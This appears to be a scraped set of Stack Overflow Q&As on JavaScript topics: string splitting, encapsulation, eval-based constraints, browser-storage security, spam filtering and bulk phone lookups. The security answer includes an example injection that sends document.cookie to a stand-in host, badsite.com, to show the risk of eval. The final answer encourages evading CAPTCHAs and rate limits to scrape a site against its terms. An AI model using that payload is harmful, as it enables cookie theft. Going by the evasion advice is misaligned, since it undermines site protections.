How to make an array from a string by newline in JavaScript?

I've got this:
var quoted_text = window.getSelection().toString();
For example:
Accepting the Terms of Service
The Stack Exchange Network (the “Network”) is a set of related
Internet sites and other applications for questions and answers, owned
and operated by Stack Exchange Inc. (“Stack Exchange”), a Delaware
corporation. Please read these terms of service (“Agreement”)
carefully before using the Network or any services provided on the
Network (collectively, “Services”). By using or accessing the
Services, you agree to become bound by all the terms and conditions of
this Agreement. If you do not agree to all the terms and conditions of
this Agreement, do not use the Services. The Services are accessed by
You (“Subscriber” or “You”) under the following terms and conditions:
1. Access to the Services
Subject to the terms and conditions of this Agreement, Stack Exchange
may offer to provide the Services, as described more fully on the
Network, and which are selected by Subscriber, solely for Subscriber’s
own use, and not for the use or benefit of any third party. Services
shall include, but not be limited to, any services Stack Exchange
performs for Subscriber, as well as the offering of any Content (as
defined below) on the Network. Stack Exchange may change, suspend or
discontinue the Services at any time, including the availability of
any feature, database, or Content. Stack Exchange may also impose
limits on certain features and services or restrict Subscriber’s
access to parts or all of the Services without notice or liability.
Stack Exchange reserves the right, at its discretion, to modify these
Terms of Service at any time by posting revised Terms of Service on
the Network and by providing notice via e-mail, where possible, or on
the Network. Subscriber shall be responsible for reviewing and
becoming familiar with any such modifications. Use of the Services by
Subscriber following such modification constitutes Subscriber's
acceptance of the terms and conditions of this Agreement as modified.
How can I make an array from that text, split by newlines?
I need to prepend the symbols "> " to the beginning of each line. How can I do that?

Use split()
For example:
var str = "abc\ndef";
console.log(str.split("\n"));
will print out
["abc", "def"]

Use JavaScript's .split() function to create an array with elements split by '\n',
and then manually iterate through that array and prepend "> " to each item. The following code may help:
var str = "How\nare\nyou\ndoing\ntoday?";
var n = str.split("\n");
for (var x in n) {
    n[x] = "> " + n[x];
    alert(n[x]);
}
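Putting the two steps together with the question's quoted_text, one compact way (a sketch using the standard split/map/join string and array methods) is to split on newlines, prefix each line with "> ", and join again:

var quoted = quoted_text
    .split("\n")
    .map(function (line) { return "> " + line; })
    .join("\n");
console.log(quoted);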

Related

What does "Decoupling Implementation Details" mean regarding encapsulation in JavaScript?

I'm reading a blog post regarding encapsulation. After reading it, I think I get what encapsulation is and why we need to use it, but at the end the author talks about the advantages of encapsulation and lists "Decoupling Implementation Details" as one of its benefits.
I'm quoting it here:
Since Encapsulation enables operating on data using a public interface, it is easier to update the implementation because the tight coupling is eliminated. This is an excellent way to always code against an interface. This also means that with Encapsulation, the object is scalable to accommodate future changes without breaking compatibility.
The Coupling means the extent to which two modules are dependent on each other. Decoupling refers to eliminating such dependencies.
I'm trying to work this out in my head, and thought that maybe a SO member could help me understand what he is talking about. Can someone explain this to me?
Thanks in advance!
Encapsulation is a conscious decision to give your code - your implementation of some functionality - a particular interface, such that consumers of your implementation assume only what they have to.
I'll start with a non-JS example, but will show one at the end.
Hostnames are an interface. IP addresses are implementation details.
When you go to Stack Overflow, you go to stackoverflow.com, you don't go to 151.101.193.69. And if you did go to 151.101.193.69, you'd notice that it's a Fastly CDN address, not a Stack Overflow address.
It's likely that when Stack Overflow just started, it implemented its web access using its own server, on a different IP address, say, for example, 198.51.100.253.
If everyone bookmarked 198.51.100.253, then when Stack Overflow started using Fastly CDN, suddenly everyone who bookmarked it - millions of people - would have to adjust.
That is a case of broken compatibility, because those millions of people would have been coupled to the IP address 198.51.100.253.
By encapsulating the IP address 198.51.100.253 - the actual detail of the implementation of web access - behind the only thing users need to know - the name of the website, stackoverflow.com, the public interface - Stack Overflow was able to migrate to Fastly CDN, and all those millions of users were none the wiser.
This was possible because all these users were not coupled to the IP address 198.51.100.253, so when it changed to 151.101.193.69, nobody was affected.
This principle applies in many areas. Here are some examples:
Energy: You pay for electricity. The supplier can provide it using coal, gas, diesel, nuclear, or hydro, and can switch from one to another without you being any the wiser; you're not coupled to hydro, because your interface is the electric socket, not a generator.
Business: When an office building hires a cleaning company to keep the building clean, it only has a contract with the company. The cleaners get hired and fired and their salaries change, but that's all encapsulated by the cleaning company and does not affect the building.
Money: You don't need money, you need food and shelter and clothes. But those are implementation details. The interface you export to your employer is money, so they don't have to pay you in food, and if you change your diet or style, they don't have to adjust what food or clothes they buy you.
Engineering: When an office building gets HVAC and it breaks, the owner just calls the HVAC company; they don't try to fix it themselves. If they did, they would void the warranty, because the HVAC company can't guarantee a good product if someone else touches the HVAC. The public interface is the maintenance contract and the HVAC's user-facing controls - you're not allowed to access the implementation directly.
And of course, software: Let's say you have a distributed key-value store which has the following client API:
client = kv.connect("endpoint.my.db");
bucket = crc(myKey);
nodeId = bucket % client.nodeCount();
myValue = client.get(nodeId, bucket, myKey);
This interface:
allows the caller to directly and easily find the node which will store the key.
allows the caller to cache bucket information to further save calls.
allows the caller to avoid extra calls to map a key to a bucket.
However, it leaks a ton of implementation details into the interface:
the existence of buckets
the usage of CRC to map keys to buckets
the bucket distribution and rebalancing strategy - the usage of bucket % nodeCount as the logic to map buckets to nodes
the fact that buckets are owned by individual nodes
And now the caller is coupled with all these implementation details. If the maintainer of the DB wants to make certain changes, they will break all existing users. Examples:
Use CRC32 instead of CRC, presumably because it's faster. This would cause existing code to use the wrong bucket and/or node, failing the queries.
Instead of round-robin buckets, allocate buckets based on storage nodes' free space, free CPU, free memory, etc. - that breaks bucket % client.nodeCount() - likewise leads to wrong bucket/node and fails queries.
Allow multiple nodes to own a bucket - requests will still go to a single node.
Change the rebalancing strategy - if a node goes down, then nodeCount goes from e.g. 3 to 2, so all the buckets have to be rebalanced such that bucket % client.nodeCount() finds the right node for each bucket.
Allow reading from any node instead of the bucket owner - requests will still go to a single node.
To decouple the caller from the implementation, you don't allow them to cache anything, save calls, or assume anything:
client = kv.connect("endpoint.my.db");
myValue = client.get(myKey);
The caller doesn't know about CRC, buckets, or even nodes.
Here, the client library has to do the extra work of figuring out which node to send the request to, perhaps with Zookeeper or a gossip protocol.
With this interface:
Hashing logic (e.g. CRC) isn't hard-coded in the caller; it's on the server side, and changing it won't break the caller.
Any bucket distribution strategy is likewise only on the server side.
Any rebalancing logic is likewise not in the client.
Other changes become possible by just upgrading the client library, without changing any code in the caller:
Allow multiple nodes to own a bucket
Read from any node (e.g. choosing the one with the lowest latency).
Switching from a Zookeeper-based node finding infrastructure to a gossip-based one.
Let's take the Map class as an example. It has an API for adding key/value entries to the map, getting the value for a key, etc. You don't know the details of how the Map stores its key/value pairs; you just know that if you use set with a key, then later do get with the same key, you'll get back the value. The details of the implementation are hidden from you, and largely don't matter to your code.¹ That's an example of how encapsulation decouples the API from the implementation details.
¹ You do know a little bit about the implementation in this specific example: the specification says "Maps must be implemented using either hash tables or other mechanisms that, on average, provide access times that are sublinear on the number of elements in the collection." So you know that a Map isn't implemented as (say) an array of key/value pairs, because that implementation wouldn't offer sublinear access times on the number of elements. But you don't know if it's a hash table or B-tree or what. Those are implementation details.
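A quick illustration of that Map interface in use - the public set/get/has API is all the calling code ever touches:

const m = new Map();
m.set("answer", 42);          // store an entry via the public interface
console.log(m.get("answer")); // 42 - retrieved without knowing how it's stored
console.log(m.has("answer")); // true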

Build Notion like filter options as part of a configuration

The goal is to build a system that can configure some constraints, similar to what Notion does with their filter properties.
System A configures the constraints and system C evaluates the constraints. Both use TypeScript. However, the constraints are stored in a Rust environment (system B). This system should be modified as little as possible. So the data flow is:
System A (TS) -> System B (Rust) -> System C (TS)
Systems A and C know the data structures, but only system C knows the actual values that are being evaluated. Thus, system A must define these constraints in an abstract way.
My best solution right now:
Store these constraints as JS expressions in the form of strings. For example, system A produces the following constraint:
const expression = "'${NAME}' === 'Zurich'"
System B can easily store this constraint without any necessary conversion since it is just a string.
System C takes the input that it received from the user, substitutes it for the placeholder ${NAME}, and calls the JS function eval(), which can evaluate strings as JS code.
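Concretely, that intended flow might look something like this sketch (the placeholder convention is from the question; the value is illustrative):

// System A produces the constraint template:
const expression = "'${NAME}' === 'Zurich'";

// System C substitutes the user's value for the placeholder and evaluates it:
const userValue = "Zurich"; // known only to system C
const concrete = expression.replace("${NAME}", userValue);
console.log(eval(concrete)); // true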
Questions:
What is the name of this problem so I can google it better? :) Is this sort of a query language?
Do you see a problem with the approach of storing strings and calling eval() on them?
Or any better ideas to achieve this?
Any libraries known that can help me with writing more complex constraints?
Background:
The real use case might help understand the problem better:
The system that is being built is a decentralized voting system.
System A is the voting authority and configures a ballot and who is allowed to vote.
This configuration is stored in a public ledger (system B).
System C is responsible for generating access tokens for eligible voters. A voter must reveal some proof, for example a passport signed by one of the eligible states (the constraints). These constraints are read directly from the ballot configuration on the blockchain.
It's probably a little late for your needs, but for future searches, I think what you're looking for is curried functions. Someone answered a similar question over here much better than I could do here: https://stackoverflow.com/a/38719906/5656259

Web browser storage: Security implications of allowing user-supplied Strings to be evaluated?

I've almost finished developing a script that exposes an API that can be used to uniformly perform storage operations on any of the web browser storage technologies.
The last bits of functionality that I'm working on are conditional retrieval and removal operations, which (of course) require a conditional expression to be supplied that will be evaluated (either using eval() or, in the case of webSQL, inserted directly after WHERE).
I'd need at least two full-blown parsers (one for WebSQL, one for IndexedDB) to verify the input as valid, but after a security assessment it seems as though parsing the input, or even sanitizing it, is unnecessary.
I'm a bit unsure of the security implications of evaluating raw strings, so I'd appreciate some input on my security assessment:
User:
Evaluating input supplied either directly or indirectly by a user
should be a non-issue due to the sandboxed nature of the storage
technologies (he/she'd be manipulating data accessible only to him/her
for a given origin), and the fact that nothing can be done with the
API that can't be done by the user directly in the browser.
Third-parties:
Storage technologies obey the same-origin policy, and thus, cannot
access the sandboxed storage areas belonging to other origins
I feel as though I've overlooked one or more possible security concerns in my assessment; is this the case? Or is the assessment (for the most part) correct?
The really relevant security question is where the condition strings come from. As long as the strings always come from the user, there's no risk - the user can eval anything directly from the JS console anyway. Once you allow the string to come from somewhere besides direct user input, you get into risky territory.
Suppose a site uses your API script in their code. Suppose also they let you save your favorite search conditionals. Suppose further that they let you share your list of favorite searches with other users. When you view a shared conditional, you are loading a string provided by another user.
Suppose one of them sends you a link to view his saved conditional:
foo==5; e=document.createElement('iframe'); e.src='http://badsite.com/stealcookies?'+document.cookie; document.body.appendChild(e);
When you load the conditional into your data viewer, you've just exposed your cookie data to another website.
For WebSQL injection (as opposed to eval), the same kind of damage is possible, but limited to your data store, rather than your entire JavaScript execution environment.
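For the WebSQL side, the usual mitigation is to bind user-supplied values as "?" parameters rather than splicing them into the SQL string. A minimal sketch using the (deprecated) WebSQL API; the database name, schema, and key are assumptions, and note this protects values only - a user-supplied conditional expression would still need structural validation:

var userSuppliedKey = 'someKey'; // assume this came from user input
var db = openDatabase('mydb', '1.0', 'demo', 2 * 1024 * 1024);
db.transaction(function (tx) {
  tx.executeSql(
    'SELECT value FROM store WHERE key = ?',
    [userSuppliedKey], // bound, not concatenated - no injection
    function (tx, results) { console.log(results.rows); }
  );
});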

What is the best way to filter spam with JavaScript?

I have recently been inspired to write spam filters in JavaScript, Greasemonkey-style, for several websites I use that are prone to spam (especially in comments). When considering my options about how to go about this, I realize I have several options, each with pros/cons. My goal for this question is to expand on this list I have created, and hopefully determine the best way of client-side spam filtering with JavaScript.
As for what makes a spam filter the "best", I would say these are the criteria:
Most accurate
Least vulnerable to attacks
Fastest
Most transparent
Also, please note that I am trying to filter content that already exists on websites that aren't mine, using Greasemonkey Userscripts. In other words, I can't prevent spam; I can only filter it.
Here is my attempt, so far, to compile a list of the various methods along with their shortcomings and benefits:
Rule-based filters:
What it does: "Grades" a message by assigning a point value to different criteria (i.e. all uppercase, all non-alphanumeric, etc.) Depending on the score, the message is discarded or kept.
Benefits:
Easy to implement
Mostly transparent
Shortcomings:
Transparent: it's usually easy to reverse engineer the code to discover the rules, and thereby craft messages that won't be picked up
Hard to balance point values (false positives)
Can be slow; multiple rules have to be executed on each message, often using regular expressions
In a client-side environment, server interaction or user interaction is required to update the rules
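The toy grader referenced above might look like this (the rules, weights, and threshold are all invented for illustration):

// Each rule awards points when its test matches.
var rules = [
  { points: 3, test: function (m) { return m === m.toUpperCase() && /[A-Z]/.test(m); } }, // all caps
  { points: 2, test: function (m) { return (m.match(/https?:\/\//g) || []).length > 2; } }, // many links
  { points: 1, test: function (m) { return /!{3,}/.test(m); } } // "!!!"
];

function grade(message) {
  return rules.reduce(function (sum, r) { return sum + (r.test(message) ? r.points : 0); }, 0);
}

// Discard anything scoring at or above a chosen threshold.
console.log(grade("BUY NOW!!!") >= 3); // true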
Bayesian filtering:
What it does: Analyzes word frequency (or trigram frequency) and compares it against the data it has been trained with. (A toy sketch follows this section's lists.)
Benefits:
No need to craft rules
Fast (relatively)
Tougher to reverse engineer
Shortcomings:
Requires training to be effective
Trained data must still be accessible to JavaScript; usually in the form of human-readable JSON, XML, or flat file
Data set can get pretty large
Poorly designed filters are easily confused by a good helping of common words added to lower the spamacity rating
Words that haven't been seen before can't be accurately classified, sometimes resulting in incorrect classification of an entire message
In a client-side environment, server interaction or user interaction is required to update the rules
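And the toy word-frequency scorer referenced above (the counts are invented; a real filter would train these tables from labeled spam/ham corpora):

var spamCounts = { viagra: 40, free: 30, hello: 2 };
var hamCounts  = { viagra: 1,  free: 5,  hello: 50 };

function spamScore(message) {
  // Sum per-word log-likelihood ratios; add-one smoothing handles unseen words.
  return message.toLowerCase().split(/\W+/).filter(Boolean)
    .reduce(function (score, word) {
      var s = (spamCounts[word] || 0) + 1;
      var h = (hamCounts[word] || 0) + 1;
      return score + Math.log(s / h);
    }, 0);
}

console.log(spamScore("FREE viagra") > 0);  // true: leans spam
console.log(spamScore("hello there") > 0);  // false: leans ham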
Bayesian filtering, server-side:
What it does: Applies Bayesian filtering server side by submitting each message to a remote server for analysis.
Benefits:
All the benefits of regular Bayesian filtering
Training data is not revealed to users/reverse engineers
Shortcomings:
Heavy traffic
Still vulnerable to uncommon words
Still vulnerable to adding common words to decrease spamacity
The service itself may be abused
To train the classifier, it may be desirable to allow users to submit spam samples for training. Attackers may abuse this service
Blacklisting:
What it does: Applies a set of criteria to a message or some attribute of it. If one or more (or a specific number of) criteria match, the message is rejected. A lot like rule-based filtering, so see its description for details.
CAPTCHAs, and the like:
Not feasible for this type of application. I am trying to apply these methods to sites that already exist. Greasemonkey will be used to do this; I can't start requiring CAPTCHAs in places that they weren't before someone installed my script.
Can anyone help me fill in the blanks? Thank you!
There is no "best" way, especially for all users or all situations.
Keep it simple:
Have the GM script initially hide all comments that contain links and maybe universally bad words (F*ck, Presbyterian, etc.). ;)
Then the script contacts your server and lets the server judge each comment by X criteria (more on that below).
Show or hide comments based on the server response. In the event of a timeout, show or hide based on a user preference setting ("What to do when the filter server is down? Show/hide comments with links").
That's it for the GM script; the rest is handled by the server.
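A rough sketch of that userscript flow; the filter endpoint, the ".comment" selector, and the response format (an array of booleans) are all assumptions:

var comments = Array.prototype.slice.call(document.querySelectorAll('.comment'));

// 1. Initially hide comments that contain links.
comments.forEach(function (c) {
  if (c.querySelector('a')) { c.style.display = 'none'; }
});

// 2. Ask the filter server to judge each comment, then show/hide accordingly.
GM_xmlhttpRequest({
  method: 'POST',
  url: 'https://example.com/judge', // hypothetical filter server
  headers: { 'Content-Type': 'application/json' },
  data: JSON.stringify(comments.map(function (c) { return c.textContent; })),
  timeout: 5000,
  onload: function (resp) {
    var isSpam = JSON.parse(resp.responseText); // e.g. [true, false, ...]
    comments.forEach(function (c, i) {
      c.style.display = isSpam[i] ? 'none' : '';
    });
  },
  // 3. On timeout, fall back to the user's "server is down" preference.
  ontimeout: function () { /* show or keep hidden per user setting */ }
});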
As for the actual server/filtering criteria...
Most important: do not dare to assume that you can guess what a user will want filtered! This will vary wildly from person to person, or even mood to mood.
Set up the server to use a combination of bad words, bad link destinations (.ru and .cn domains, for example), and public spam-filtering services.
The most important thing is to offer users some way to choose and ideally adjust what is applied, for them.

I want to query whitepages.com 4,000 times, how to save the results?

I have an old customer list of 4,000 businesses. I want to determine if the phone numbers associated with each listing are still working (and therefore the business is probably still open).
I can put each number into whitepages.com and check them one by one... but I want to automate the results. I have looked at their API and can't digest it. I can form the correct query URL, but trying things like curl -O doesn't work.
I have access to Mac tools and Unix tools, and could try various JavaScript approaches if anyone could point me in the right direction... would even pay. Help?
Thx
As per Pekka's comment, most companies with a public API don't allow scraping in their terms of service, so it's quite possible that performing 4k GET requests to their website will flag you as a malicious user and get you blacklisted!
Their API is RESTful and seems simple and pretty well documented; definitely try to get that working instead of going the other way. A good first attempt after getting your API key would be to write a Unix script to perform a reverse phone number lookup. For example, suppose you had all 4,000 10-digit phone numbers in a flat text file, one per line with no formatting; you could write a simple bash script as follows:
#!/bin/bash
INPUT_FILE=phone_numbers.txt
OUTPUT_DIR=output
API_KEY='MyWhitePages.comApiKey'
BASE_URL='http://api.whitepages.com'

# Make sure the output directory exists.
mkdir -p "$OUTPUT_DIR"

# Perform a reverse lookup on each phone number in the input file.
for PHONE in $(cat "$INPUT_FILE"); do
    URL="${BASE_URL}/reverse_phone/1.0/?phone=${PHONE};api_key=${API_KEY}"
    curl "$URL" > "${OUTPUT_DIR}/result-${PHONE}.xml"
done
Once you've retrieved all the results you can either parse the XML to analyze the matching businesses, or, if you're just interested in existence, you could simply grep each output file for the string "The search did not find results", which, from the WhitePages.com API, indicates no match. If the grep succeeds, the business doesn't exist (or changed its phone number); otherwise it's probably still around (or another business exists with that phone number).
As others have noted, it is a ToS violation to scrape our website or to store the data returned from the API. However, you can get the data you want from our pro service at:
https://pro.whitepages.com/list-update/upload_file
Dan
Whitepages API lead.
You can scrape the website. They have limits if you keep coming from the same IP, plus CAPTCHAs, but it's easy enough to get around if you know what you're doing. Also, while it might violate the ToS, it's certainly not illegal. The law says you can't copyright phone numbers and addresses, so you don't have much to worry about.
